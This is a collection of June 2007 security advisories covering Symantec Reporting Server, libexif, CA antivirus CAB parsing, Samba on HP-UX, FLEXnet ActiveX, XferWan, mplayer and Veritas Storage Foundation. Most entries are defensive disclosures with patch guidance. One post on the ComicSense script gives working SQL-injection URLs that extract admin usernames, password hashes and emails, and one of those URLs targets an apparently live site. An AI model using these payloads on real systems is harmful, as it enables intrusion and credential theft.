SYM07-011 Symantec Reporting Server password disclosure
SYM07-011: Symantec Reporting Server Password Disclosure June 5, 2007 Risk Impact: Medium Remote Access: Yes Local Access: Yes Authentication Required:Yes Exploit available: No Overview The administrator password for Symantec Reporting Server could be disclosed after a failed login attempt. Affected Product: Reporting Server from version 1.0.197.0 up to the solution Solution: Reporting 1.0.224.0 Available with SAV 10.1 MR6 build 6000 (10.1.6.6000) or later Details Symantec Reporting Server is an optional web application within the Symantec System Center console that can be used to be used to create reports about Symantec Client Security and Symantec AntiVirus products in an enterprise network. Symantec was notified that a failed attempt to log in to the Reporting server could result in displaying a hashed version of the password. An attacker could potentially use the hashed password to gain access to the Reporting Server database with administrator rights. Symantec Response Symantec engineers confirmed that this vulnerability exists in the versions of Reporting Server included with Symantec Client Security 3.1 and SAV CE 10.1, as indicated in the table above. Updates have been released to address the vulnerability. A successful attacker would gain access only to the Reporting Server database. The attacker would not automatically have access to other programs on the computer, unless the same account and password are used for other programs. As a best practice, the accounts created for managing Reporting Server should not use the same id and password as the users network login credentials. During the internal review of the issue, Symantec engineers also identified and fixed aseparate issue which could allow an attacker disable the authentication system for the SCS Reporting server. If successfully exploited, this could allow a remote attacker to bypass authentication and access the reporting database. Mitigation - Uninstall Reporting Server if it is not being used - Symantec Client Security Console and the Reporting Server interface should be restricted to trusted access only. - Ensuring that the Console and Reporting are never visible external to the network greatly reduces opportunities for unauthorized remote access. - User accounts for Reporting Server should be different than the users network login account. Symantec is not aware of any customers impacted by this issue, or of any attempts to exploit the issue. As a part of normal best practices, users should keep vendor-supplied patches for all application software and operating systems up-to-date. Symantec strongly recommends any affected customers update SAV Reporting immediately to protect against possible attempts to exploit this vulnerability. Credit Symantec would like to thank Mikko Korppi for reporting this issue, and coordinating with us on the response. CVE This issue is a candidate for inclusion in the Common Vulnerabilities and Exposures (CVE) list (http://cve.mitre.org), which standardizes names for security problems. The CVE initiative has assigned CVE-2007-3022 to this issue Updates Any future updates to this advisory, if required, will be posted on the Symantec Advisory page: http://www.symantec.com/avcenter/security/Content/2007.06.05.html -BEGIN PGP SIGNED MESSAGE- Hash: SHA256 Symantec Product Security Team. Symantec takes the security and proper functionality of its products very seriously. As founding members of the Organization for Internet Safety (OISafety), Symantec follows the principles of responsible disclosure. Symantec also subscribes to the vulnerability guidelines outlined by the National Infrastructure Advisory Council (NIAC). Please contact [EMAIL PROTECTED] if you feel you have discovered security issue with a Symantec product. Copyright (c) 2007 by Symantec Corp. -BEGIN PGP SIGNATURE- Version: PGP Desktop 9.0.6 (Build 6060) iQEVAwUBRmW1Af9Lqygkbb6BAQifiwf+NfiU2gdBPuwRVUAQ/sxHEPCEq7E6TI8g VXBzyVpjUla772Fcko3NPXr3pVAVsJCvEIH5rhiWWGfkVIvaOLBBRVoUr8PED6Nd HaqlKAvj4PPPygRHGPjos/vaoI03N2MoIAJtjBVFqc/23Yz/0f5NDDjvj5pvzY19 Tf7XyfqYkShgxAqbu8VCb0x8s2Ge6RADFWRI7MHhRuRTkoRVPKoIGHQLuIE+b/S4 /Hu4FpU6QDEfeyat5h9ty9lWtD+6sPWIQcM9ieylRIxZ5JAKJuGSKVt7o8QjxLzg EjVYtWcBLJAg1Ky/apFNIr6H9TPKwJkuXJHtp3qG+LFR9MQKk51U0w== =N+kW -END PGP SIGNATURE-
Comicsense SQL Injection Advisory/Exploit
* * Comicsense SQL Injection Advisory/Exploit * * by s0cratex [EMAIL PROTECTED] http://plexinium.net - ComicSense is a script using php / mySQL. It allows you to easily host an Online Comic or Image shack. You can download it from www.gayadesign.nl/comicsense/ - The bug is a common sql injection in "index.php" Line 32: $sqlQuery = "SELECT * FROM " . $prefix . "comic WHERE episodenr = $epi"; And the variable $epi is not verified... Exploit: Admin username http://site.com/comic_paht/index.php?epi=-1 UNION SELECT username,1,1 FROM users MD5 hash password: http://site.com/comic_paht/index.php?epi=-1 UNION SELECT password,1,1 FROM users e-Mail adress: http://www.sneakyshits.com/comics/index.php?epi=-1 union select email,1,1 from users
[ GLSA 200706-01 ] libexif: Integer overflow vulnerability
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Gentoo Linux Security Advisory GLSA 200706-01 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - http://security.gentoo.org/ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Severity: Normal Title: libexif: Integer overflow vulnerability Date: June 05, 2007 Bugs: #178081 ID: 200706-01 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Synopsis libexif fails to handle Exif (EXchangeable Image File) data inputs, making it vulnerable to an integer overflow. Background == libexif is a library for parsing, editing and saving Exif data. Affected packages = --- Package / Vulnerable / Unaffected --- 1 media-libs/libexif < 0.6.15>= 0.6.15 Description === Victor Stinner reported an integer overflow in the exif_data_load_data_entry() function from file exif-data.c while handling Exif data. Impact == An attacker could entice a user to process a file with specially crafted Exif extensions with an application making use of libexif, which will trigger the integer overflow and potentially execute arbitrary code or crash the application. Workaround == There is no known workaround at this time. Resolution == All libexif users should upgrade to the latest version. Please note that users upgrading from "<=media-libs/libexif-0.6.13" should also run revdep-rebuild after their upgrade. # emerge --sync # emerge --ask --oneshot --verbose ">=media-libs/libexif-0.6.15" # revdep-rebuild --library=/usr/lib/libexif.so References == [ 1 ] CVE-2007-2645 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-2645 Availability This GLSA and any updates to it are available for viewing at the Gentoo Security Website: http://security.gentoo.org/glsa/glsa-200706-01.xml Concerns? = Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users machines is of utmost importance to us. Any security concerns should be addressed to [EMAIL PROTECTED] or alternatively, you may file a bug at http://bugs.gentoo.org. License === Copyright 2007 Gentoo Foundation, Inc; referenced text belongs to its owner(s). The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license. http://creativecommons.org/licenses/by-sa/2.5 pgp4PZAP7yvwS.pgp Description: PGP signature
ZDI-07-034: CA Multiple Product AV Engine CAB Filename Parsing Stack Overflow Vulnerability
ZDI-07-034: CA Multiple Product AV Engine CAB Filename Parsing Stack Overflow Vulnerability http://www.zerodayinitiative.com/advisories/ZDI-07-034.html June 5, 2007 -- CVE ID: CVE-2007-2863 -- Affected Vendor: Computer Associates -- Affected Products: CA Anti-Virus eTrust EZ Antivirus CA Internet Security Suite 2007 eTrust Internet Security Suite eTrust EZ Armor CA Threat Manager CA Protection Suites CA Secure Content Manager CA Anti-Virus Gateway Unicenter Network and Systems Management BrightStor ARCserve Backup CA Common Services -- TippingPoint(TM) IPS Customer Protection: TippingPoint IPS customers have been protected against this vulnerability since November 30, 2006 by Digital Vaccine protection filter ID 4874. For further product information on the TippingPoint IPS: http://www.tippingpoint.com -- Vulnerability Details: This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of various Computer Associates products. The specific flaw exists in the parsing of .CAB archives. When a long filename contained in the .CAB is processed by vete.dll an exploitable stack overflow may occur. -- Vendor Response: Computer Associates has issued an update to correct this vulnerability. More details can be found at: http://supportconnectw.ca.com/public/antivirus/infodocs/caantivirus-securitynotice.asp -- Disclosure Timeline: 2006.11.08 - Vulnerability reported to vendor 2006.11.30 - Digital Vaccine released to TippingPoint customers 2007.06.05 - Coordinated public release of advisory -- Credit: This vulnerability was discovered by an anonymous researcher. -- About the Zero Day Initiative (ZDI): Established by TippingPoint, a division of 3Com, The Zero Day Initiative (ZDI) represents a best-of-breed model for rewarding security researchers for responsibly disclosing discovered vulnerabilities. Researchers interested in getting paid for their security research through the ZDI can find more information and sign-up at: http://www.zerodayinitiative.com The ZDI is unique in how the acquired vulnerability information is used. 3Com does not re-sell the vulnerability details or any exploit code. Instead, upon notifying the affected product vendor, 3Com provides its customers with zero day protection through its intrusion prevention technology. Explicit details regarding the specifics of the vulnerability are not exposed to any parties until an official vendor patch is publicly available. Furthermore, with the altruistic aim of helping to secure a broader user base, 3Com provides this vulnerability information confidentially to security vendors (including competitors) who have a vulnerability protection or mitigation product. CONFIDENTIALITY NOTICE: This e-mail message, including any attachments, is being sent by 3Com for the sole use of the intended recipient(s) and may contain confidential, proprietary and/or privileged information. Any unauthorized review, use, disclosure and/or distribution by any recipient is prohibited. If you are not the intended recipient, please delete and/or destroy all copies of this message regardless of form and any included attachments and notify 3Com immediately by contacting the sender via reply e-mail or forwarding to 3Com at [EMAIL PROTECTED]
SYM07-012 Symantec Reporting Server elevation of privilege
SYM07-012 Symantec Reporting Server Elevation of Privilege June 5, 2007 Risk Impact Medium Remote Access: Yes Local Access: Yes Authentication Required: No Exploit available: No Overview Files created by a Reporting Server may be accessible to an unauthorized user. Affected Products Reporting 1.0.197.0, up to the solution SAV 10.1 MR6 build 6000 (10.1.6.6000) or later Solution Reporting 1.0.224.0 or later Reporting is not available as a stand-alone application, but is distributed with Symantec AntiVirus and Symantec Client Security. Reporting 1.0.224.0 or later is available with the following products SAV 10.1 MR6 build 6000 (10.1.6.6000) or later SCS 3.1 MR6 build 6000 (3.1.6.6000) or later Details Symantec Reporting Server is an optional web application within the Symantec System Center console that can be used to be used to create reports about Symantec Client Security and Symantec AntiVirus products in an enterprise network. Symantec was notified that a file created in the process of exporting data from Reporting Server could be potentially be manipulated by an unauthorized user to create a malicious executable file. An attacker could then execute the file, potentially gaining access to the server in the context of the web server user. Symantec Response Symantec engineers verified that the issue exists in Reporting Server included with the product versions listed above. The error occurred due to the improper initialization of a variable, and updates have been released to correct the problem. This vulnerability affects only systems on which the Reporting Server program is installed. Individual client systems are not affected. Symantec is not aware of any customers impacted by this issue, or of any attempts to exploit the issue. However, we recommend that customers update Reporting Server immediately to protect against possible attempts to exploit this issue. Mitigation and best practices - Uninstall Reporting Server if it is not being used - Symantec Client Security Console (SCS Console) and the Reporting Server interface should be restricted to trusted access only. - Ensure that the SCS Console and Reporting Server interface are never visible external to the network. This greatly reduces opportunities for unauthorized remote access. - User accounts for Reporting Server should be unique, and different from the users network login account. - Delete exported data files which are no longer needed. Credit Symantec would like to thank Ertunga Arsal of Tech Data GmbH & Co. OHG for reporting this issue, and coordinating with us on the response. CVE This issue is a candidate for inclusion in the Common Vulnerabilities and Exposures (CVE) list (http://cve.mitre.org), which standardizes names for security problems. The CVE initiative has assigned CVE-2007-3021 to this issue -BEGIN PGP SIGNED MESSAGE- Hash: SHA256 Symantec Product Security Team Symantec takes the security and proper functionality of its products very seriously. As founding members of the Organization for Internet Safety (OISafety), Symantec follows the principles of responsible disclosure. Symantec also subscribes to the vulnerability guidelines outlined by the National Infrastructure Advisory Council (NIAC). Please contact [EMAIL PROTECTED] if you feel you have discovered a potential or actual security issue with a Symantec product. Copyright (c) 2007 by Symantec Corp. -BEGIN PGP SIGNATURE- Version: PGP Desktop 9.0.6 (Build 6060) iQEVAwUBRmW5bf9Lqygkbb6BAQjVQQf7BjFMagCcjl+kkYiEEcphatUuDi1sDZ+h r2eRvO+8RbCzNoGWuBFiK9ExIhhQNRTDCkvceDcFFOBtKVv7wg/LGw935O8P7+PK lsdT+UEdCFqyUu+mteYARW4uQ9b17luDoxU2cEa6iZ9qS/6uzLEAkNQXo0Tm2PlT elYjlv5m13FSbAd+KfRh94XRguxrKZ/i8KxzsS8E0RvmADW+mjYbNv1rRT5C3AGr Kl7f3c07U4+DfISxDcAVjZwgK6lA42qLih8M2iC4P2bQJ1Ml3Uukxnt1EOLFBNo2 5UXMaAZ7lSK7l+ZIg1q57h5tsXOp9FQQaN7rSk2ObEvGoGheK3wiww== =CXAH -END PGP SIGNATURE-
ZDI-07-035: CA Multiple Product AV Engine CAB Header Parsing Stack Overflow Vulnerability
ZDI-07-035: CA Multiple Product AV Engine CAB Header Parsing Stack Overflow Vulnerability http://www.zerodayinitiative.com/advisories/ZDI-07-035.html June 5, 2007 -- CVE ID: CVE-2007-2864 -- Affected Vendor: Computer Associates -- Affected Products: CA Anti-Virus eTrust EZ Antivirus CA Internet Security Suite 2007 eTrust Internet Security Suite eTrust EZ Armor CA Threat Manager CA Protection Suites CA Secure Content Manager CA Anti-Virus Gateway Unicenter Network and Systems Management BrightStor ARCserve Backup CA Common Services -- Vulnerability Details: This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of various Computer Associates products. The specific flaw exists within the processing of an improperly defined "coffFiles" field in .CAB archives. Large values result in an unbounded data copy operation which can result in an exploitable stack-based buffer overflow. -- Vendor Response: Computer Associates has issued an update to correct this vulnerability. More details can be found at: http://supportconnectw.ca.com/public/antivirus/infodocs/caantivirus-securitynotice.asp -- Disclosure Timeline: 2007.02.16 - Vulnerability reported to vendor 2007.06.05 - Coordinated public release of advisory -- Credit: This vulnerability was discovered by an anonymous researcher. -- About the Zero Day Initiative (ZDI): Established by TippingPoint, a division of 3Com, The Zero Day Initiative (ZDI) represents a best-of-breed model for rewarding security researchers for responsibly disclosing discovered vulnerabilities. Researchers interested in getting paid for their security research through the ZDI can find more information and sign-up at: http://www.zerodayinitiative.com The ZDI is unique in how the acquired vulnerability information is used. 3Com does not re-sell the vulnerability details or any exploit code. Instead, upon notifying the affected product vendor, 3Com provides its customers with zero day protection through its intrusion prevention technology. Explicit details regarding the specifics of the vulnerability are not exposed to any parties until an official vendor patch is publicly available. Furthermore, with the altruistic aim of helping to secure a broader user base, 3Com provides this vulnerability information confidentially to security vendors (including competitors) who have a vulnerability protection or mitigation product. CONFIDENTIALITY NOTICE: This e-mail message, including any attachments, is being sent by 3Com for the sole use of the intended recipient(s) and may contain confidential, proprietary and/or privileged information. Any unauthorized review, use, disclosure and/or distribution by any recipient is prohibited. If you are not the intended recipient, please delete and/or destroy all copies of this message regardless of form and any included attachments and notify 3Com immediately by contacting the sender via reply e-mail or forwarding to 3Com at [EMAIL PROTECTED]
[security bulletin] HPSBUX02218 SSRT071424 rev.1 - HP-UX running CIFS Server (Samba), Remote Arbitrary Code Execution
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 SUPPORT COMMUNICATION - SECURITY BULLETIN Document ID: c01067768 Version: 1 HPSBUX02218 SSRT071424 rev.1 - HP-UX running CIFS Server (Samba), Remote Arbitrary Code Execution NOTICE: The information in this Security Bulletin should be acted upon as soon as possible. Release Date: 2007-05-29 Last Updated: 2007-06-04 Potential Security Impact: Remote arbitrary code execution Source: Hewlett-Packard Company, HP Software Security Response Team VULNERABILITY SUMMARY Potential vulnerabilities have been identified with HP-UX running CIFS Server (Samba). The vulnerabilities could be exploited remotely to execute arbitrary code. References: CVE-2007-2446, CVE-2007-2447 SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed. HP-UX B.11.11, B.11.23, B.11.31 running CIFS Server (Samba) A.02.01, A.02.01.01,A.02.01.02, A.02.02, A.02.02.01, A.02.02.02, A.02.03, A.02.03.01. BACKGROUND To determine if an HP-UX system has an affected version, search the output of "swlist -a revision -l fileset" for an affected fileset. Then determine if the recommended patch or update is installed. AFFECTED VERSIONS HP-UX B.11.11 HP-UX B.11.23 HP-UX B.11.31 == CIFS-Server.CIFS-ADMIN CIFS-Server.CIFS-DOC CIFS-Server.CIFS-LIB CIFS-Server.CIFS-MAN CIFS-Server.CIFS-RUN CIFS-Server.CIFS-UTIL action: install revision A.02.03.02 or subsequent END AFFECTED VERSIONS RESOLUTION HP has made the following available to resolve the vulnerability: HP-UX release CIFS Server (Samba) revision Install recommendation B.11.11, B.11.23, B.11.31 A.02.01, A.02.01.01, A.02.01.02, A.02.02, A.02.02.01, A.02.02.02, A.02.03, A.02.03.01 revision A.02.03.02 or subsequent The updates can be downloaded from http://www.hp.com/go/softwaredepot/ MANUAL ACTIONS: Yes - Update CIFS / Samba on HP-UX B.11.11 install revision A.02.03.02 or subsequent. CIFS / Samba on HP-UX B.11.23 install revision A.02.03.02 or subsequent. CIFS / Samba on HP-UX B.11.31 install revision A.02.03.02 or subsequent. PRODUCT SPECIFIC INFORMATION HP-UX Software Assistant: HP-UX Software Assistant is an enhanced application that replaces HP-UX Security Patch Check. It analyzes all HP-issued Security Bulletins and lists recommended actions that may apply to a specific HP-UX system. It can also download patches and create a depot automatically. For more information see: https://www.hp.com/go/swa HISTORY Version: 1 (rev.1) - 04 June 2007 Initial release Third Party Security Patches: Third party security patches which are to be installed on systems running HP software products should be applied in accordance with the customer's patch management policy. Support: For further information, contact normal HP Services support channel. Report: To report a potential security vulnerability with any HP supported product, send Email to: [EMAIL PROTECTED] It is strongly recommended that security related information being communicated to HP be encrypted using PGP, especially exploit information. To get the security-alert PGP key, please send an e-mail message as follows: To: [EMAIL PROTECTED] Subject: get key Subscribe: To initiate a subscription to receive future HP Security Bulletins via Email: http://h30046.www3.hp.com/driverAlertProfile.php?regioncode=NA&langcode=USENG&jumpid=in_SC-GEN__driverITRC&topiccode=ITRC On the web page: ITRC security bulletins and patch sign-up Under Step1: your ITRC security bulletins and patches - check ALL categories for which alerts are required and continue. Under Step2: your ITRC operating systems - verify your operating system selections are checked and save. To update an existing subscription: http://h30046.www3.hp.com/subSignIn.php Log in on the web page: Subscriber's choice for Business: sign-in. On the web page: Subscriber's Choice: your profile summary - use Edit Profile to update appropriate sections. To review previously published Security Bulletins visit: http://www.itrc.hp.com/service/cki/secBullArchive.do * The Software Product Category that this Security Bulletin relates to is represented by the 5th and 6th characters of the Bulletin number in the title: GN = HP General SW MA = HP Management Agents MI = Misc. 3rd Party SW MP = HP MPE/iX NS = HP NonStop Servers OV = HP OpenVMS PI = HP Printing & Imaging ST = HP Storage SW TL = HP Trusted Linux TU = HP Tru64 UNIX UX = HP-UX VV = HP VirtualVault System management and security procedures must be reviewed frequently to maintain system integrity. HP is continually reviewing and enhancing the security features of software products to provide customers with current secure solutions. "HP is broadly distributing this Security Bulletin in order to bring to the attention of users of the affected HP products the important security information contained in this Bulletin. HP recommends that all users determine the applicability of this information to t
TPTI-07-09: Macrovision FLEXnet boisweb.dll ActiveX Control Buffer Overflow Vulnerability
TPTI-07-09: Macrovision FLEXnet boisweb.dll ActiveX Control Buffer Overflow Vulnerability http://dvlabs.tippingpoint.com/advisory/TPTI-07-09 June 4, 2007 -- CVE ID: CVE-2007-2419 -- Affected Vendor: Macrovision -- Affected Products: Update Service 3.x Update Service 4.x Update Service 5.x FLEXnet Connect 6 -- TippingPoint(TM) IPS Customer Protection: TippingPoint IPS customers have been protected against this vulnerability since November 6, 2006 by Digital Vaccine protection filter ID 4323, 4327. For further product information on the TippingPoint IPS: http://www.tippingpoint.com -- Vulnerability Details: This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Business Objects Crystal Reports. Exploitation requires the target to visit a malicious web site. This specific flaw exists within the ActiveX control with CLSID 85A4A99C-8C3D-499E-A386-E0743DFF8FB7. Specifying large values to two specific functions available in this control results in an exploitable stack based buffer overflow. The vulnerable function / parameters include: * DownloadAndExecute(), second of five parameters * AddFileEx(), third of seven parameters -- Vendor Response: Notification was recently (January) sent to Macrovision customers about the vulnerability and the correct way to resolve it (patching to a newer version of the agent resolves the issue). The exact timing of this deployment is left to our customers and partner. -- Disclosure Timeline: 2006.06.22 - Vulnerability reported to vendor 2006.11.06 - Digital Vaccine released to TippingPoint customers 2007.06.04 - Coordinated public release of advisory -- Credit: This vulnerability was discovered by Pedram Amini, TippingPoint DVLabs CONFIDENTIALITY NOTICE: This e-mail message, including any attachments, is being sent by 3Com for the sole use of the intended recipient(s) and may contain confidential, proprietary and/or privileged information. Any unauthorized review, use, disclosure and/or distribution by any recipient is prohibited. If you are not the intended recipient, please delete and/or destroy all copies of this message regardless of form and any included attachments and notify 3Com immediately by contacting the sender via reply e-mail or forwarding to 3Com at [EMAIL PROTECTED]
TPTI-07-10: Centennial Software XferWan.exe Stack Overflow Vulnerability
TPTI-07-10: Centennial Software XferWan.exe Stack Overflow Vulnerability http://dvlabs.tippingpoint.com/advisory/TPTI-07-10 June 4, 2007 -- CVE ID: CVE-2007-2514 -- Affected Vendor: Centennial Software -- Affected Products: Symantec Discovery 6.5 -- TippingPoint(TM) IPS Customer Protection: TippingPoint IPS customers have been protected against this vulnerability since April 3, 2007 by Digital Vaccine protection filter ID 5231. For further product information on the TippingPoint IPS: http://www.tippingpoint.com -- Vulnerability Details: This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of software utilizing Centennial Software XferWan. Authentication is not required to exploit this vulnerability. The specific flaw exists during the parsing of overly long requests to the XferWAN process. When logging requests, user-supplied data is copied to the stack resulting in an exploitable buffer overflow condition. The following disassembly excerpt from the logging function demonstrates the issue: 004047A0 mov cl, Filename[eax] 004047A6 mov [esp+eax+890h+ExistingFileName], cl 004047AD inc eax 004047AE test cl, cl 004047B0 jnz short loc_4047A0 A lack of sanity checking on the size of 'Filename' results in an exploitable stack-based buffer overflow vulnerability that can result in a system compromise running under the context of the SYSTEM user. -- Vendor Response: Centennial has rectified an issue in the XFERWAN omponent of Centennial Discovery which could be remotely exploited by malicious people to compromise a system. This issue only affects systems running non-secure communications, which comprise a very small percentage of installations worldwide. Customers can find instructions on how to identify if they are susceptible to the vulnerability and correct, if necessary on the Centennial Customer Support website. -- Disclosure Timeline: 2007.03.07 - Vulnerability reported to vendor 2007.04.03 - Digital Vaccine released to TippingPoint customers 2007.06.04 - Coordinated public release of advisory -- Credit: This vulnerability was discovered by Cody Pierce, TippingPoint DVLabs CONFIDENTIALITY NOTICE: This e-mail message, including any attachments, is being sent by 3Com for the sole use of the intended recipient(s) and may contain confidential, proprietary and/or privileged information. Any unauthorized review, use, disclosure and/or distribution by any recipient is prohibited. If you are not the intended recipient, please delete and/or destroy all copies of this message regardless of form and any included attachments and notify 3Com immediately by contacting the sender via reply e-mail or forwarding to 3Com at [EMAIL PROTECTED]
[ MDKSA-2007:112 ] - Updated mplayer packages fix buffer overflow vulnerability
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 ___ Mandriva Linux Security Advisory MDKSA-2007:112 http://www.mandriva.com/security/ ___ Package : mplayer Date: June 4, 2007 Affected: 2007.0, 2007.1, Corporate 3.0 ___ Problem Description: Buffer overflow in the asmrp_eval function for the Real Media input plugin allows remote attackers to cause a denial of service and possibly execute arbitrary code via a rulebook with a large number of rulematches. Updated packages have been patched to correct this issue. ___ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-6172 ___ Updated Packages: Mandriva Linux 2007.0: 830fb73b1b7ef7bce6f6f21a44d9e89f 2007.0/i586/libdha1.0-1.0-1.pre8.13.3mdv2007.0.i586.rpm 0235e5abe7ff905ccbe2623876946915 2007.0/i586/mencoder-1.0-1.pre8.13.3mdv2007.0.i586.rpm 54faca2a832a87403e4ac4f02b719d9e 2007.0/i586/mplayer-1.0-1.pre8.13.3mdv2007.0.i586.rpm 3adef91daba9c23859a411e6e7fed99d 2007.0/i586/mplayer-gui-1.0-1.pre8.13.3mdv2007.0.i586.rpm 77b7d6c6bcaeabeacffc1a67b11783e3 2007.0/SRPMS/mplayer-1.0-1.pre8.13.3mdv2007.0.src.rpm Mandriva Linux 2007.0/X86_64: 7db8e08bbc3a2a7780b9cb6172372966 2007.0/x86_64/mencoder-1.0-1.pre8.13.3mdv2007.0.x86_64.rpm 5b94344377c17fc27cc6387c1f8d56dc 2007.0/x86_64/mplayer-1.0-1.pre8.13.3mdv2007.0.x86_64.rpm ec5d71b9b1ab30deb6fe717a4361c7ed 2007.0/x86_64/mplayer-gui-1.0-1.pre8.13.3mdv2007.0.x86_64.rpm 77b7d6c6bcaeabeacffc1a67b11783e3 2007.0/SRPMS/mplayer-1.0-1.pre8.13.3mdv2007.0.src.rpm Mandriva Linux 2007.1: e35f5cf2df21511dc7c1b8b5d95a4936 2007.1/i586/libdha1.0-1.0-1.rc1.11.1mdv2007.1.i586.rpm da4702585498a73d5697e55a5e08f834 2007.1/i586/mencoder-1.0-1.rc1.11.1mdv2007.1.i586.rpm 22be41581519dc8d8e6e1a28472fe35d 2007.1/i586/mplayer-1.0-1.rc1.11.1mdv2007.1.i586.rpm 76bd7950cd1790bbf3caeaa3de75202a 2007.1/i586/mplayer-doc-1.0-1.rc1.11.1mdv2007.1.i586.rpm 48cc118f6e33ddc1db7268b7a4436c51 2007.1/i586/mplayer-gui-1.0-1.rc1.11.1mdv2007.1.i586.rpm f6328948547b7dcb4c085ce1e959986f 2007.1/SRPMS/mplayer-1.0-1.rc1.11.1mdv2007.1.src.rpm Mandriva Linux 2007.1/X86_64: 780ef1ea825746d89c0ad855920383fe 2007.1/x86_64/mencoder-1.0-1.rc1.11.1mdv2007.1.x86_64.rpm 1d338368b9c85ba5b537eab6d7458e26 2007.1/x86_64/mplayer-1.0-1.rc1.11.1mdv2007.1.x86_64.rpm 274d7330781b618dcf413fda2231615f 2007.1/x86_64/mplayer-doc-1.0-1.rc1.11.1mdv2007.1.x86_64.rpm 955284559324b44e9e6ddbf60c682d68 2007.1/x86_64/mplayer-gui-1.0-1.rc1.11.1mdv2007.1.x86_64.rpm f6328948547b7dcb4c085ce1e959986f 2007.1/SRPMS/mplayer-1.0-1.rc1.11.1mdv2007.1.src.rpm Corporate 3.0: f1b7f04506edd2f048821aa868f312b0 corporate/3.0/i586/libdha0.1-1.0-0.pre3.14.11.C30mdk.i586.rpm 4250be5ebe5ccae0f1233343699aa3a9 corporate/3.0/i586/libpostproc0-1.0-0.pre3.14.11.C30mdk.i586.rpm 9c2ee76860184398988a33347d591fd2 corporate/3.0/i586/libpostproc0-devel-1.0-0.pre3.14.11.C30mdk.i586.rpm 5d1d7efad438f4c645a9124b6c5a2ac8 corporate/3.0/i586/mencoder-1.0-0.pre3.14.11.C30mdk.i586.rpm fdd5ab4e3aefef7ea1f42c2bbf48d860 corporate/3.0/i586/mplayer-1.0-0.pre3.14.11.C30mdk.i586.rpm b493e323ce7e94c5728cc2a373c40fc5 corporate/3.0/i586/mplayer-gui-1.0-0.pre3.14.11.C30mdk.i586.rpm 228c3d1cfdc176ce0ca36af225a15683 corporate/3.0/SRPMS/mplayer-1.0-0.pre3.14.11.C30mdk.src.rpm Corporate 3.0/X86_64: 5703a3b6ccd14cd700762f63b9da58ca corporate/3.0/x86_64/lib64postproc0-1.0-0.pre3.14.11.C30mdk.x86_64.rpm 16152708c55cd45a374398cb1b0aff1a corporate/3.0/x86_64/lib64postproc0-devel-1.0-0.pre3.14.11.C30mdk.x86_64.rpm 2fc00f3155f4f51875b66ae27207c275 corporate/3.0/x86_64/mplayer-1.0-0.pre3.14.11.C30mdk.x86_64.rpm 152fbb089a239522190c7ec6d1720c46 corporate/3.0/x86_64/mplayer-gui-1.0-0.pre3.14.11.C30mdk.x86_64.rpm 228c3d1cfdc176ce0ca36af225a15683 corporate/3.0/SRPMS/mplayer-1.0-0.pre3.14.11.C30mdk.src.rpm ___ To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you. All packages are signed by Mandriva for security. You can obtain the GPG public key of the Mandriva Security Team by executing: gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98 You can view other update advisories for Mandriva Linux at: http://www.mandriva.com/security/advisories If you want to report vulnerabilities, please contact security_(at)_mandriva.com ___ Type Bits/KeyID Date User ID pub 1024D/22458A98 2000-07-10 Mandriva Secu
TPTI-07-08: Symantec Veritas Storage Foundation Scheduler Service Authentication Bypass Vulnerability
TPTI-07-08: Symantec Veritas Storage Foundation Scheduler Service Authentication Bypass Vulnerability http://dvlabs.tippingpoint.com/advisory/TPTI-07-08 June 4, 2007 -- CVE ID: CVE-2007-2279 -- Affected Vendor: Symantec -- Affected Products: Veritas Storage Foundation -- Vulnerability Details: This vulnerability allows an attacker to execute arbitrary code on vulnerable installations of Symantec Veritas Storage Foundation. Authentication is not required to exploit this vulnerability. The specific flaw exists in the functionality exposed by the Storage Foundation for Windows Scheduler Service, VxSchedService.exe, which listens by default on TCP port 4888. During normal use an administrator may add schedules to be run using the management console which requires authentication. However, if an attacker connects directly to the scheduler service and issues the commands, there exists no validation of credentials. The packet is parsed for requests as shown in the following snippet: .text:01016720 mov eax, [ebp-80h] ; controlled buffer .text:01016723 dec eax ; .text:01016724 mov byte ptr [ebp-4], 1 .text:01016728 jz create_registry .text:0101672E dec eax .text:0101672F jz short delete_registry .text:01016731 dec eax .text:01016732 dec eax .text:01016733 jz short modify_registry A malicious attacker is able to add, modify, or delete registry values from HKEY_LOCAL_MACHINE\Software\Veritas\VxSvc\CurrentVersion\Schedules which holds the schedules for snapshots. Each schedule has a PreScript and PostScript field which allow for arbitrary commands to be executed when the schedule is run. Modification or either of these fields will allow for remote code execution. -- Vendor Response: http://seer.entsupport.symantec.com/docs/288627.htm -- Disclosure Timeline: 2007.02.08 - Vulnerability reported to vendor 2007.06.04 - Coordinated public release of advisory -- Credit: This vulnerability was discovered by Aaron Portnoy, TippingPoint DVLabs CONFIDENTIALITY NOTICE: This e-mail message, including any attachments, is being sent by 3Com for the sole use of the intended recipient(s) and may contain confidential, proprietary and/or privileged information. Any unauthorized review, use, disclosure and/or distribution by any recipient is prohibited. If you are not the intended recipient, please delete and/or destroy all copies of this message regardless of form and any included attachments and notify 3Com immediately by contacting the sender via reply e-mail or forwarding to 3Com at [EMAIL PROTECTED]
[ MDKSA-2007:111 ] - Updated util-linux packages address login access policies bypassing issue
